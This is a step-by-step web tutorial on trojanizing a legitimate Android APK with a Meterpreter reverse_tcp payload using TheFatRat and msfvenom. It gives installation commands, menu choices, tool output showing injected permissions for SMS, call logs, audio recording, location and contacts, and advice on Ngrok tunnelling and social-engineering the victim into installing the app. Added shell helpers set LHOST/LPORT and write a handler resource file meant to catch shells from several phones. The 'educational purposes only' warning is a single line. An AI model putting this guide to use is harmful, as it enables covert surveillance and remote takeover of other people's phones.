Embed Metasploit Payload on APK on Android File [Step-by-Step]


Kali Linux, Ethical hacking

Reviewer: Deepak Prasad

 

In this guide we will embed a payload in a legitimate APK installer file. With over 2.5 billion active devices worldwide, Android is the most widely used operating system on phones and tablets, which makes it a prime target for criminals. Security researchers regularly uncover Android malware and Trojans used to steal data, spy on persons of interest and enlist devices into botnets, and one common delivery method is a trojanized copy of a legitimate app.

In this guide I will show you how to embed a payload in an APK file using TheFatRat.

What is FatRat

TheFatRat is an exploitation tool that generates backdoors carrying well-known Metasploit payloads for Windows, macOS, Linux and Android targets. It automates embedding a payload in an APK file intended for Android devices, and it bundles techniques that try to evade antivirus detection so the backdoor is less likely to raise an alarm on the user's device. Some advantages of using FatRat include:

  • It automates the process of embedding a payload in an APK file.
  • It supports many types of backdoors and payloads across different OS platforms.
  • It is open source.

 

Pre-requisites

 

What we expect from you

 

WARNING:
This guide has been made for educational purposes only. Before you attack any device, make sure you have the explicit permission of its owner; otherwise you are breaking the cyber laws and regulations of your country.

With that information in mind, let's jump right into the tutorial.

 

Steps to install FatRat

Step 1: Cloning FatRat from Github

We use the command below to clone it from its GitHub repository.

git clone https://github.com/Screetsec/TheFatRat.git

 

Step 2: Navigate to its directory

In this step we change into the TheFatRat directory to continue with the installation.

cd TheFatRat

 

Step 3: Installing FatRat

This is the final step. We make setup.sh executable and start the installation. Run it as root, since it installs system packages and the fatrat launcher.

chmod +x setup.sh && ./setup.sh

 

Steps to embed a payload on apk installer file

Step 1: Starting the FatRat

In the first step of this guide we start the framework that will generate the payload and embed it in the APK. Open a new terminal and run

┌──(toxic㉿kali)-[~]
└─$ sudo fatrat

in that terminal. Make sure to run the framework as root.

 

Step 2: Selecting the operation we want to perform

The first run may take a while because FatRat installs additional dependencies it needs, so make sure you have a stable internet connection. We are then shown a menu of backdoor types, and we choose option 5, “Backdooring original apk”.


 

Step 3: Setting LHOST and LPORT

In this step we set LHOST, the address the payload will connect back to, and LPORT, the port it will connect to. If the target device is on the same LAN, use the local IP address of your attacking machine. If the target is on the internet and you are tunnelling with Ngrok, use the hostname and port that Ngrok assigns to your TCP tunnel as the payload's LHOST and LPORT (the handler itself still listens on the local port the tunnel forwards to). In our case the target is on the same LAN, so we use our local IP address and set LPORT to 4444; any free port works.

NOTE:
You will get an error if you choose a port that is already in use by another service on the attacking machine, so pick a free one.
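Before typing the values into FatRat it is worth checking them from a shell. The helper below is an added example, not part of TheFatRat or the original article: it reads the listening sockets from /proc/net/tcp to see whether a candidate LPORT is free and picks the next free one, and prints the first address from hostname -I as the LAN LHOST (the assumption being that the first address belongs to the interface facing the target).

```shell
#!/bin/sh
# Added example, not part of TheFatRat: sanity-check LHOST/LPORT before entering them.

# Hex form of a TCP port as it appears in /proc/net/tcp (e.g. 4444 -> 115C).
port_hex() {
    printf '%04X' "$1"
}

# First address reported by `hostname -I`.
# Assumption: it is on the interface facing the target; check with `ip addr` if unsure.
lan_ip() {
    hostname -I 2>/dev/null | awk '{print $1}'
}

# Exit status 0 if a socket is already LISTENing on TCP port $1, 1 if the port is free,
# 2 if /proc/net/tcp cannot be read (non-Linux host, restricted container).
port_in_use() {
    [ -r /proc/net/tcp ] || return 2
    hexport=$(port_hex "$1")
    # Column 2 is local_address as HEXIP:HEXPORT, column 4 is the socket state; 0A = LISTEN.
    cat /proc/net/tcp /proc/net/tcp6 2>/dev/null | awk -v p="$hexport" '
        NR > 1 && $4 == "0A" { split($2, a, ":"); if (a[2] == p) found = 1 }
        END { exit !found }'
}

# Print the requested port if it is free, otherwise the next free port above it.
pick_lport() {
    port=${1:-4444}
    while port_in_use "$port"; do
        port=$((port + 1))
    done
    echo "$port"
}

# Usage on the attacking box: these are the values to type at the LHOST/LPORT prompts.
echo "LHOST=$(lan_ip) LPORT=$(pick_lport 4444)"
```

If port_in_use reports status 2 the check could not be made; fall back to `ss -ltn` on the attacking machine in that case.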


 

Step 4: Enter path to our original apk

In this step we are asked for the path to the original APK. We provide the path to the APK we downloaded, which will be embedded with the payload, and press Enter to continue to the next step.

 Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)
 Path : /yourpath/originalapp.apk

 

Step 5: Choosing payload

Having set the path to our APK, FatRat tests whether the app is compatible and takes us to payload selection. We choose android/meterpreter/reverse_tcp, a staged payload that connects back to the LHOST we provided on the LPORT we provided once the user installs and launches the app. The listener must be configured with the same payload, otherwise the staged connection fails. Note that reverse_tcp traffic is not encrypted; android/meterpreter/reverse_https is available if the session needs to be wrapped in TLS.


 

Step 6: Selecting tool to create the payload.

We are asked which tool should build the backdoored APK. We use the MsfVenom Embedded method, which wraps msfvenom's own APK template injection (msfvenom -x original.apk -p android/meterpreter/reverse_tcp ...), as the "Using APK template" line in the output below shows.

[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++    ]
 +-------------------------------------+
 | [ 1 ] Use Backdoor-apk 0.2.4a       |
 | [ 2 ] Use old Fatrat method         |
 | [ 3 ] Use MsfVenom Embedded method  |
 +-------------------------------------+

 Select Tool to create apk : 3

 

Step 7: Creating a listener to use with msfconsole

FatRat now runs msfvenom to decompile the original APK, inject the Meterpreter payload, rebuild, sign and align it, and then offers to write a Metasploit resource (.rc) file that configures a matching handler in msfconsole. That handler gives us a reverse shell once the user installs and launches the backdoored application.

---------Backdooring your apk with MSFVenom-----------

Using APK template: /home/toxic/TheFatRat/temp/app.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package tk.mugasystems.torchprohd.uczro
[*] Loading /tmp/d20211101-6822-e9cmol/original/smali/tk/mugasystems/torchprohd/Welcomescreen.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WAKE_LOCK"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20211101-6822-e9cmol/output.apk
[*] Signing /tmp/d20211101-6822-e9cmol/output.apk
[*] Aligning /tmp/d20211101-6822-e9cmol/output.apk
Payload size: 3405002 bytes
Saved as: temp/backand.apk

-----------------------Finished-----------------------


Your backdoored apk can be found in : /root/Fatrat_Generated/app_backdoored.apk

 Do you want to create a listener for this configuration
 to use in msfconsole in future ?

 Choose y/n : y

Now everything has been generated: the backdoored APK and the listener resource file for msfconsole are stored in their respective folders.


 

Step 8: Loading the listener to msfconsole and installing apk on target device

We now deliver the backdoored APK to the target, using social engineering if necessary so the user installs it. Two practical caveats: the user must allow installation from unknown sources, and because the rebuilt APK is signed with a freshly generated key, Android will refuse to install it over an existing copy of the original app. Make sure the listener is already running in msfconsole so the connection is caught when the app starts.

To load the listener file into msfconsole we use the following command.

msfconsole -r yourlistener.rc

When you load the .rc file, msfconsole configures exploit/multi/handler with the payload, LHOST and LPORT we chose and reports the address it is listening on.
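FatRat writes the listener as a Metasploit resource file. The function below is an added example, not FatRat's own generator: it produces an equivalent .rc file for a given payload, LHOST and LPORT so you can recreate the listener by hand or move it to another port later, and it refuses an LPORT that is not a valid port number, since a handler on the wrong port silently never receives the callback. The file name and address values are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not from TheFatRat: write a Metasploit resource file that
# configures exploit/multi/handler to match the payload embedded in the APK.

# write_handler_rc PAYLOAD LHOST LPORT OUTFILE
# Returns 1 unless LPORT is a number in 1..65535.
write_handler_rc() {
    payload=$1; lhost=$2; lport=$3; outfile=$4
    case "$lport" in
        ''|*[!0-9]*) echo "LPORT must be numeric: $lport" >&2; return 1 ;;
    esac
    if [ "$lport" -lt 1 ] || [ "$lport" -gt 65535 ]; then
        echo "LPORT out of range: $lport" >&2; return 1
    fi
    # ExitOnSession false plus exploit -j -z keeps the handler alive as a background
    # job, so several phones can call back to the same listener without restarting it.
    cat > "$outfile" <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# Usage (values are assumptions; use the LHOST/LPORT you gave FatRat):
#   write_handler_rc android/meterpreter/reverse_tcp 192.168.1.10 4444 handler.rc
#   msfconsole -q -r handler.rc
```

The PAYLOAD line must match the payload chosen in Step 5 exactly; a reverse_tcp APK cannot complete its staged connection to a reverse_https handler.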

 

Once the listener is running and the target launches the app, we get a Meterpreter session, as shown below, from which we can browse the device's folders and add or remove files remotely.


 

Summary

In the above guide we embedded a backdoor in a legitimate app and installed it on an Android device to gain a shell from which we can remotely issue commands to the device. This process can be used to backdoor any legitimate app, including those found on the Play Store, so we recommend that you avoid installing apps from third-party sources. Because the repackaged app is signed with a key that differs from the original developer's, the tampering is visible to anyone who compares the signing certificate with the Play Store version. You can use the above guide to backdoor any app of your liking provided you remain within the cyber laws of your country.

 


 

Kennedy Muthii

He is an accomplished professional proficient in Python, ethical hacking, Linux, cybersecurity, and OSINT. With a track record including winning a national cybersecurity contest, launching a startup in Kenya, and holding a degree in information science, he is currently engaged in cutting-edge research in ethical hacking. You can connect with him on his LinkedIn profile.


7 thoughts on “Embed Metasploit Payload on APK on Android File [Step-by-Step]”

      • I am a root user; to run this program my code is like this…
        rootuser $cd/home/user/TheFatRat
        gives cd to thefatrat directory
        ls
        in the list fatrat is there but it is not running..
        sudo fatrat or just entering fatrat as a root user makes no sense to run that program.
        I tried various python, bash things to run that file.. no use

